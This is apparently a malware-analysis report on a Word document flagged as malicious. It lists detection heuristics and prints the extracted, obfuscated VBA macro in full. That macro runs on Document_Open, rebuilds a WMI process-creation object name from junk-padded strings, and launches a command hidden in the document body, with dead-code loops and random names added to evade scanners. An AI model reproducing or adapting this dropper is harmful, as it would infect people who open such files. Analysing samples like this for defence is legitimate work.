MALICIOUS
112
Risk Score
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Gzk2wkgbhs7 = CreateObject(Ny3ntbh8br75xmtk_4) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13374 bytes |
SHA-256: 677a0d005ae04c8307c7de65f2777948b2ff8aecc70418e3245d78851c56f294 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
113 of 186 identifiers look randomly generated (e.g. 'Gsbw9rhcxky572s2ev') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Tmlal0ens8wu_k"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
L3g0mx0zd96dnr
End Sub
Attribute VB_Name = "Jyg64cwez38qs"
Attribute VB_Name = "K7irhvyk1l2qvfj4"
Function L3g0mx0zd96dnr()
On Error Resume Next
V1 = Gsbw9rhcxky572s2ev + Tmlal0ens8wu_k.Content + U3_sajjpz0xg
GoTo hwiKCGs
Dim aJFsjCH As Paragraph
Set udQexI = NSqinQRFB
For Each aJFsjCH In Tmlal0ens8wu_k.Paragraphs
Set ysnCAFkdE = yzenA
If Left(aJFsjCH.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
hwiKCGs = aJFsjCH.Range.ListFormat.ListString
ElseIf InStr(aJFsjCH.Range.Text, "kkiew") > 1 Then
DQOueLQ = aJFsjCH.Range.Text
DQOueLQ = Replace(saw, "sjgwb", "hqkwjbjdasd" & hwiKCGs)
aJFsjCH.Range.Text = DQOueLQ
Set aJFsjCH.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set pQZRBOM = TNpWFHGB
Next aJFsjCH
hwiKCGs:
U7 = "sg yw ahpsg yw ah"
S66copskgnknsnfo0v = "sg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah"
GoTo zkgKFWJA
Dim HwnTBzhE As Paragraph
Set REJqVCBF = RYwhi
For Each HwnTBzhE In Tmlal0ens8wu_k.Paragraphs
Set Jnadq = HiuGR
If Left(HwnTBzhE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
zkgKFWJA = HwnTBzhE.Range.ListFormat.ListString
ElseIf InStr(HwnTBzhE.Range.Text, "kkiew") > 1 Then
HJGmXJKi = HwnTBzhE.Range.Text
HJGmXJKi = Replace(saw, "sjgwb", "hqkwjbjdasd" & zkgKFWJA)
HwnTBzhE.Range.Text = HJGmXJKi
Set HwnTBzhE.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set GNJma = RIMsHDFCF
Next HwnTBzhE
zkgKFWJA:
Te8wtcbyvvpoxmxd = "sg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ah"
GoTo EuGvHJIFA
Dim muNeZ As Paragraph
Set fkRNB = jEjDb
For Each muNeZ In Tmlal0ens8wu_k.Paragraphs
Set ETZnBE = AtFJIJRH
If Left(muNeZ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
EuGvHJIFA = muNeZ.Range.ListFormat.ListString
ElseIf InStr(muNeZ.Range.Text, "kkiew") > 1 Then
wfkZc = muNeZ.Range.Text
wfkZc = Replace(saw, "sjgwb", "hqkwjbjdasd" & EuGvHJIFA)
muNeZ.Range.Text = wfkZc
Set muNeZ.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set UqpFTrw = xQzwHl
Next muNeZ
EuGvHJIFA:
Cqmvqwv2mhgj = "wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ah"
GoTo CfgeBBaeG
Dim BESpqUGB As Paragraph
Set mkfqAz = DvSJBmm
For Each BESpqUGB In Tmlal0ens8wu_k.Paragraphs
Set odXVBPDIF = NKAdBk
If Left(BESpqUGB.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
CfgeBBaeG = BESpqUGB.Range.ListFormat.ListString
ElseIf InStr(BESpqUGB.Range.Text, "kkiew") > 1 Then
PqLZEEBcU = BESpqUGB.Range.Text
PqLZEEBcU = Replace(saw, "sjgwb", "hqkwjbjdasd" & CfgeBBaeG)
BESpqUGB.Range.Text = PqLZEEBcU
Set BESpqUGB.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set gAGhcQ = bLQawH
Next BESpqUGB
CfgeBBaeG:
M8smj2v5dy0 = "sg yw ahsg yw ah" + Mid(Application.Name, 3 + 3, 1 / 1) + "sg yw ahsg yw ah"
GoTo RaxKCu
Dim ISbAC As Paragraph
Set WAoynI = zWGQC
For Each ISbAC In Tmlal0ens8wu_k.Paragraphs
Set sOwvFZGAB = yCfiiI
If Left(ISbAC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
RaxKCu = ISbAC.Range.ListFormat.ListString
ElseIf InStr(ISbAC.Range.Text, "kkiew") > 1 Then
CScvCwx = ISbAC.Range.Text
CScvCwx = Replace(saw, "sjgwb", "hqkwjbjdasd" & RaxKCu)
ISbAC.Range.Text = CScvCwx
Set ISbAC.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set ZJlJb = WTLimgC
Next ISbAC
RaxKCu:
A2e4ktou59ym67 = Cqmvqwv2mhgj + M8smj2v5dy0 + Te8wtcbyvvpoxmxd + U7 + S66copskgnknsnfo0v
GoTo dRABFBB
Dim noIBAaC As Paragraph
Set kruzC = TUQrBlJ
For Each noIBAaC In Tmlal0ens8wu_k.Paragraphs
Set FgbwN = kVFKH
If Left(noIBAaC.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
dRABFBB = noIBAaC.Range.ListFormat.ListString
ElseIf InStr(noIBAaC.Range.Text, "kkiew") > 1 Then
gpiKAaAi = noIBAaC.Range.Text
gpiKAaAi = Replace(saw, "sjgwb", "hqkwjbjdasd" & dRABFBB)
noIBAaC.Range.Text = gpiKAaAi
Set noIBAaC.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set JfbchTi = VaarJII
Next noIBAaC
dRABFBB:
Ny3ntbh8br75xmtk_4 = Ov6308djv6_5w(A2e4ktou59ym67)
GoTo rMLXDHuiA
Dim RaSTCBJP As Paragraph
Set aJnNECLFy = UrNjvhJ
For Each RaSTCBJP In Tmlal0ens8wu_k.Paragraphs
Set nBpcJQIFr = UnVIVP
If Left(RaSTCBJP.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
rMLXDHuiA = RaSTCBJP.Range.ListFormat.ListString
ElseIf InStr(RaSTCBJP.Range.Text, "kkiew") > 1 Then
BtKBDQAAH = RaSTCBJP.Range.Text
BtKBDQAAH = Replace(saw, "sjgwb", "hqkwjbjdasd" & rMLXDHuiA)
RaSTCBJP.Range.Text = BtKBDQAAH
Set RaSTCBJP.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set ZWCPB = iSVWDABGx
Next RaSTCBJP
rMLXDHuiA:
Set Gzk2wkgbhs7 = CreateObject(Ny3ntbh8br75xmtk_4)
GoTo qmcUJFIkH
Dim pZRhAd As Paragraph
Set dsOgH = ghJbIGA
For Each pZRhAd In Tmlal0ens8wu_k.Paragraphs
Set xvdqU = LtrMAz
If Left(pZRhAd.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
qmcUJFIkH = pZRhAd.Range.ListFormat.ListString
ElseIf InStr(pZRhAd.Range.Text, "kkiew") > 1 Then
sCCwGluQV = pZRhAd.Range.Text
sCCwGluQV = Replace(saw, "sjgwb", "hqkwjbjdasd" & qmcUJFIkH)
pZRhAd.Range.Text = sCCwGluQV
Set pZRhAd.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set xckQJjGr = lnWpeBmI
Next pZRhAd
qmcUJFIkH:
KK = Ov6308djv6_5w(Mid(V1, (4), Len(V1)))
Gzk2wkgbhs7.Create KK, K8ka8isk2neww2v, Lq8dbfky4j36sxr
GoTo fEIDYIi
Dim NTBhU As Paragraph
Set xCruEHCw = NgUxCJEDv
For Each NTBhU In Tmlal0ens8wu_k.Paragraphs
Set NBVpnD = trvZFE
If Left(NTBhU.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
fEIDYIi = NTBhU.Range.ListFormat.ListString
ElseIf InStr(NTBhU.Range.Text, "kkiew") > 1 Then
EOtuGBnEz = NTBhU.Range.Text
EOtuGBnEz = Replace(saw, "sjgwb", "hqkwjbjdasd" & fEIDYIi)
NTBhU.Range.Text = EOtuGBnEz
Set NTBhU.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set dgzQUgD = DLxkDEEBm
Next NTBhU
fEIDYIi:
End Function
Function Ov6308djv6_5w(Lcy44518cplc4cdl)
On Error Resume Next
GoTo pZEXFDA
Dim abZHkJZBK As Paragraph
Set YrQXFBD = cPcoEIP
For Each abZHkJZBK In Tmlal0ens8wu_k.Paragraphs
Set mQQtFWB = LzYPjECj
If Left(abZHkJZBK.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
pZEXFDA = abZHkJZBK.Range.ListFormat.ListString
ElseIf InStr(abZHkJZBK.Range.Text, "kkiew") > 1 Then
KEgih = abZHkJZBK.Range.Text
KEgih = Replace(saw, "sjgwb", "hqkwjbjdasd" & pZEXFDA)
abZHkJZBK.Range.Text = KEgih
Set abZHkJZBK.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set bMKKwJBJ = bHpJIdF
Next abZHkJZBK
pZEXFDA:
W8j46swfqtk0f8 = Lcy44518cplc4cdl
GoTo gDjlOXAGL
Dim VtqjnDAAM As Paragraph
Set zfIqJDAyQ = rHeRGcl
For Each VtqjnDAAM In Tmlal0ens8wu_k.Paragraphs
Set KuspFXDAI = RgTaF
If Left(VtqjnDAAM.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
gDjlOXAGL = VtqjnDAAM.Range.ListFormat.ListString
ElseIf InStr(VtqjnDAAM.Range.Text, "kkiew") > 1 Then
UMykQGB = VtqjnDAAM.Range.Text
UMykQGB = Replace(saw, "sjgwb", "hqkwjbjdasd" & gDjlOXAGL)
VtqjnDAAM.Range.Text = UMykQGB
Set VtqjnDAAM.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set kVBKFt = SoNHdIQGF
Next VtqjnDAAM
gDjlOXAGL:
Gpa2l8f4ctfd = Dn5xw1w7tvdndn1c(W8j46swfqtk0f8)
GoTo VDHCrG
Dim AWMwqBS As Paragraph
Set dgbwxFS = IecymB
For Each AWMwqBS In Tmlal0ens8wu_k.Paragraphs
Set HmtZDHAPD = bhPQFE
If Left(AWMwqBS.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
VDHCrG = AWMwqBS.Range.ListFormat.ListString
ElseIf InStr(AWMwqBS.Range.Text, "kkiew") > 1 Then
tcMeW = AWMwqBS.Range.Text
tcMeW = Replace(saw, "sjgwb", "hqkwjbjdasd" & VDHCrG)
AWMwqBS.Range.Text = tcMeW
Set AWMwqBS.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set QjNsmG = EyKmAhJch
Next AWMwqBS
VDHCrG:
Ov6308djv6_5w = Gpa2l8f4ctfd
GoTo ZPfdf
Dim iFTXYv As Paragraph
Set qqRWy = qWiIGIGDJ
For Each iFTXYv In Tmlal0ens8wu_k.Paragraphs
Set RfMFdCA = sphJe
If Left(iFTXYv.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
ZPfdf = iFTXYv.Range.ListFormat.ListString
ElseIf InStr(iFTXYv.Range.Text, "kkiew") > 1 Then
UByyeFoDR = iFTXYv.Range.Text
UByyeFoDR = Replace(saw, "sjgwb", "hqkwjbjdasd" & ZPfdf)
iFTXYv.Range.Text = UByyeFoDR
Set iFTXYv.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set MDECCyAp = GqvyGaB
Next iFTXYv
ZPfdf:
End Function
Function Dn5xw1w7tvdndn1c(V0ni5l31tngqzygft)
GoTo zEIeyAFHA
Dim nEjQW As Paragraph
Set cWESA = glTmjCF
For Each nEjQW In Tmlal0ens8wu_k.Paragraphs
Set XtpLXACJ = icbjIBkPN
If Left(nEjQW.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
zEIeyAFHA = nEjQW.Range.ListFormat.ListString
ElseIf InStr(nEjQW.Range.Text, "kkiew") > 1 Then
WQlDA = nEjQW.Range.Text
WQlDA = Replace(saw, "sjgwb", "hqkwjbjdasd" & zEIeyAFHA)
nEjQW.Range.Text = WQlDA
Set nEjQW.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set LzeAIr = yDNJHzE
Next nEjQW
zEIeyAFHA:
GoTo ZaqfIEn
Dim oieHJ As Paragraph
Set pfFsgD = MyOTpvy
For Each oieHJ In Tmlal0ens8wu_k.Paragraphs
Set INUuF = qPMosxkC
If Left(oieHJ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
ZaqfIEn = oieHJ.Range.ListFormat.ListString
ElseIf InStr(oieHJ.Range.Text, "kkiew") > 1 Then
dtfoAJA = oieHJ.Range.Text
dtfoAJA = Replace(saw, "sjgwb", "hqkwjbjdasd" & ZaqfIEn)
oieHJ.Range.Text = dtfoAJA
Set oieHJ.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set GAzFBIY = gLlPDxBAH
Next oieHJ
ZaqfIEn:
GoTo SNNwFD
Dim dLQfA As Paragraph
Set OQpTCDE = uPQltOqx
For Each dLQfA In Tmlal0ens8wu_k.Paragraphs
Set eqnVhPDJA = xcstPND
If Left(dLQfA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
SNNwFD = dLQfA.Range.ListFormat.ListString
ElseIf InStr(dLQfA.Range.Text, "kkiew") > 1 Then
pRcaEJIJe = dLQfA.Range.Text
pRcaEJIJe = Replace(saw, "sjgwb", "hqkwjbjdasd" & SNNwFD)
dLQfA.Range.Text = pRcaEJIJe
Set dLQfA.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set tJTsGC = pbleBAz
Next dLQfA
SNNwFD:
Dn5xw1w7tvdndn1c = Replace(V0ni5l31tngqzygft, "sg yw ah", Hw711_sg6h_xpvamq)
GoTo jEkOBLAE
Dim plGpJFAEA As Paragraph
Set SExKUUII = ZkmbzLECn
For Each plGpJFAEA In Tmlal0ens8wu_k.Paragraphs
Set fVuSP = sFWYrjIFK
If Left(plGpJFAEA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
jEkOBLAE = plGpJFAEA.Range.ListFormat.ListString
ElseIf InStr(plGpJFAEA.Range.Text, "kkiew") > 1 Then
joMVJ = plGpJFAEA.Range.Text
joMVJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & jEkOBLAE)
plGpJFAEA.Range.Text = joMVJ
Set plGpJFAEA.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set UJduJGOD = RfMxHPIA
Next plGpJFAEA
jEkOBLAE:
GoTo zeuJUFK
Dim aHEDDgEi As Paragraph
Set WoWJAgAwH = YSoqB
For Each aHEDDgEi In Tmlal0ens8wu_k.Paragraphs
Set XDTJcA = ZduQIJIBJ
If Left(aHEDDgEi.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
zeuJUFK = aHEDDgEi.Range.ListFormat.ListString
ElseIf InStr(aHEDDgEi.Range.Text, "kkiew") > 1 Then
hdKBL = aHEDDgEi.Range.Text
hdKBL = Replace(saw, "sjgwb", "hqkwjbjdasd" & zeuJUFK)
aHEDDgEi.Range.Text = hdKBL
Set aHEDDgEi.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set SvgorClJy = EkvUPdHq
Next aHEDDgEi
zeuJUFK:
GoTo jZuvLChdg
Dim VsPUFmpJ As Paragraph
Set mwfUC = BmPRA
For Each VsPUFmpJ In Tmlal0ens8wu_k.Paragraphs
Set XlGjQ = WixdyrE
If Left(VsPUFmpJ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
jZuvLChdg = VsPUFmpJ.Range.ListFormat.ListString
ElseIf InStr(VsPUFmpJ.Range.Text, "kkiew") > 1 Then
FzAaFN = VsPUFmpJ.Range.Text
FzAaFN = Replace(saw, "sjgwb", "hqkwjbjdasd" & jZuvLChdg)
VsPUFmpJ.Range.Text = FzAaFN
Set VsPUFmpJ.Range.ParagraphStyle = Tmlal0ens8wu_k.Styles("Normal")
End If
Set ywthAQL = tiPWn
Next VsPUFmpJ
jZuvLChdg:
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.